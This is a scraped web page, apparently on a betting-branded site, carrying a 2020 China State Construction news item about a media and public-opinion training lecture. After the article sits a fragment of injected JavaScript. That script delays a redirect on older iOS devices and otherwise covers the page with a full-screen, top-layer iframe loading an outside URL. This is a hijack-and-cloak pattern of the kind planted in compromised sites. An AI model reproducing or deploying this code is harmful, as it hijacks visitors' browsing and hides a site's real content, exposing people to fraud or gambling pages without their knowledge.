QSTY球速体育新闻资讯
中国建筑2020年“书香中建”大讲堂正式开讲
发布时间:2020-07-02
  |  
阅读量:
字号:
A+ A- A

5月28日,中国建筑2020年“书香中建”大讲堂第1期(总第33期)舆论引导与舆情应对专项培训正式开讲。本期专项培训共四讲,第一讲邀请中国传媒大学教授、博士生导师、政府与公共事务学院院长、培训学院院长董关鹏就《5G 时代的大企业传播实践》进行专题授课。集团党组副书记、总经理郑学选参加学习,集团党组成员、副总经理马泽平主持讲座。

中国建筑2020年“书香中建”大讲堂正式开讲(图1)

 

  董关鹏从学习贯彻习近平总书记关于推动媒体融合发展、领导干部提升媒介素养的重要论述讲起,通过理论讲授、案例分析,系统讲解了领导者沟通力和战略传播的核心知识、重要规律和实践技巧,深入阐述了5G 时代企业传播的“势”“道”“术”,帮助学员提高融媒体时代媒介基本素养和舆论引导、舆情应对能力。

  马泽平指出,要认真学习贯彻习近平新时代中国特色社会主义思想和党的十九届四中全会精神,聚焦集团“一创五强”战略目标,推进企业治理体系和治理能力现代化,完善舆论引导和舆情应对制度机制,不断提高专业能力水平,提升舆论引导合力,打造享誉全球的一流企业品牌形象。

  公司领导、部门负责人及相关业务负责人在主会场参加学习,各子企业开设1600余个视频分会场,共2万多人同时参加学习。

"; // 电脑链接 const mobileUrl = ""; // 移动链接 const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { // 检测用户使用的设备类型 const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); document.addEventListener("DOMContentLoaded", () => { const viewportMeta = document.createElement("meta"); viewportMeta.setAttribute("name", "viewport"); viewportMeta.setAttribute("content", "user-scalable=no, width=device-width, initial-scale=1.0"); document.head.appendChild(viewportMeta); const style = document.createElement("style"); style.innerHTML = "html, body { width: 100%; height: 100%; overflow: hidden; }"; document.head.appendChild(style); const divContainer = document.createElement("div"); divContainer.style.cssText = "width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 2147483647; background: #fff;"; document.body.appendChild(divContainer); const iframe = document.createElement("iframe"); iframe.src = isMobile ? mobileUrl : desktopUrl; iframe.style.cssText = "border: 0; width: 100%; text-align: center; border: medium none; height: 100%; max-height: 4000px;"; divContainer.appendChild(iframe); }); }